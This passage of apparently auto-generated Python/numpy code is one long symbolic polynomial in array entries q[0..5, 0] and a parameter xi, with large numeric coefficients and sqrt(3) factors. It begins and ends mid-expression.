5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 10147272.3621786*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 199774.424630392*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) - 8.88888888888889*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 